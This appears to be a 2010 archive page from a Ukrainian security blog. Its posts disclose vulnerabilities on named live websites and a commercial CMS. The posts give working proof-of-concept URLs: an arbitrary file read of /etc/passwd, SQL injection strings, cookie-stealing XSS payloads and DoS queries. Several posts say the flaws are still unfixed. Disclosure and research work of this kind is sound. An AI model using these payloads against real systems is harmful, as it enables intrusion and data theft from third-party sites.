Архів для категорії 'Уразливості'

Уразливості на ksbm.net

22:37 22.11.2010

12.03.2010

У вересні, 03.09.2009, я знайшов Arbitrary File Disclosure та Full path disclosure уразливості на проекті http://ksbm.net. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

22.11.2010

Arbitrary File Disclosure:

http://ksbm.net/board_new/download.php?filename=passwd&path=/etc/

Full path disclosure:

http://ksbm.net/board_new/download.php?filename=1

Дані уразливості досі не виправлені.

Добірка уразливостей

15:23 22.11.2010

В даній добірці уразливості в веб додатках:

Уразливість на fitofarm.ua

15:12 20.11.2010

13.03.2010

У вересні, 17.09.2009, я знайшов SQL Injection уразливість на проекті http://fitofarm.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.11.2010

SQL Injection:

http://fitofarm.ua/news.php?ch=id&id=-1′%20or%20version()=5/*

Дана уразливість вже виправлена. Але частковий дефейс вони з сайту так досі й не прибрали :-) .

Добірка уразливостей

22:37 19.11.2010

В даній добірці уразливості в веб додатках:

  • HP Network Node Manager (NNM), Remote Execution of Arbitrary Commands (деталі)
  • XSS vulnerability in Eden Platform (деталі)
  • XSS vulnerability in allinta CMS (деталі)
  • Multiple Vulnerabilities in Cisco IronPort Encryption Appliance (деталі)
  • Nagios XI 2009R1.2B Multiple CSRF (деталі)
  • HP ProLiant Support Pack 8.30 for Windows, Remote Code Execution, Information Disclosure (деталі)
  • Amblog 1.0 Joomla Component Multiple SQL Injection Vulnerabilities (деталі)
  • Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection Vulnerabilities (деталі)
  • McAfee Network Security Manager Authentication Bypass and Session Hijacking Vulnerability (деталі)
  • McAfee Network Security Manager Cross-Site Scripting (XSS) Vulnerability (деталі)

Уразливості на citycom.ua

15:20 19.11.2010

06.03.2010

У серпні, 23.08.2009, я знайшов Brute Force, Full path disclosure, Insufficient Anti-automation, SQL Injection, а сьогодні ще й Information Leakage уразливості на проекті http://citycom.ua (онлайн магазин). Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.tehnos.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

19.11.2010

Brute Force:

http://base.city.com.ua/login.php

Full path disclosure:

http://base.city.com.ua/cron/export.bat

Insufficient Anti-automation:

http://base.city.com.ua/cron/send.php?type=7

SQL Injection:

http://base.city.com.ua/cron/send.php?type=-1%20or%201=1

Information Leakage:

http://base.city.com.ua/cron/send.php

http://base.city.com.ua/city.com.ua/order.php

Дані уразливості вже виправлені, за виключенням Brute Force.

Уразливості на ozhegov.info

15:08 18.11.2010

02.03.2010

У серпні, 11.08.2009, я знайшов Cross-Site Scripting та Denial of Service уразливості на проекті http://ozhegov.info. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

18.11.2010

XSS:

http://ozhegov.info/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

DoS:

http://ozhegov.info/?q=*

http://ozhegov.info/?q=%

Дані уразливості вже виправлені.

Insufficient Anti-automation та DoS в CMS SiteLogic

15:28 17.11.2010

31.08.2010

У квітні, 03.04.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в CMS SiteLogic. Це українська комерційна CMS. Уразливості виявив на одному сайті, що використовує даний движок (про інші дірки на якому я вже згадував). Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS SiteLogic.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

17.11.2010

Insufficient Anti-automation:

http://site/?mid=1

В контактній формі немає захисту від автоматизованих запитів (капчі).

DoS:

Пустий POST запит на сторінці http://site в полі “Пошук по сайту” виводить всі записи з БД.

DoS:

http://site/?mid=1&action=arhiv

На сторінці архіву виводяться всі записи з БД.

Добірка уразливостей

18:21 16.11.2010

В даній добірці уразливості в веб додатках:

Нові уразливості на www.sec.ru

15:02 16.11.2010

25.02.2010

У липні, 28.07.2009, я знайшов SQL DB Structure Extraction, Full path disclosure та Cross-Site Scripting уразливості на секюріті проекті http://www.sec.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.sec.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.11.2010

SQL DB Structure Extraction:

http://www.sec.ru/banner.cfm?id=-

Full path disclosure:

http://www.sec.ru/banner.cfm?id=-

XSS:

При запиті до сторінки http://www.sec.ru/banner.cfm?id=- з User-Agent “Mozilla<body onload=alert(document.cookie)>” можна було виконати код. Зараз уразливість вже виправлена.

XSS:

Дану уразливість спробували виправити, але погано, тому вона все ще працює (через багато інших векторів атаки).

XSS:

Більшість з даних уразливостей досі не виправлена.

Нові уразливості на www.a-counter.com

15:07 15.11.2010

15.02.2010

У липні, 10.07.2009, я знайшов SQL Injection та Denial of Service уразливості на проекті http://www.a-counter.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.a-counter.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

15.11.2010

SQL Injection:

http://www.a-counter.com/cgi-bin/search?sub_data=%22%20limit%200,1/*

DoS (через SQL Injection):

http://www.a-counter.com/cgi-bin/search?sub_data=%22%23

Дані уразливості досі не виправлені.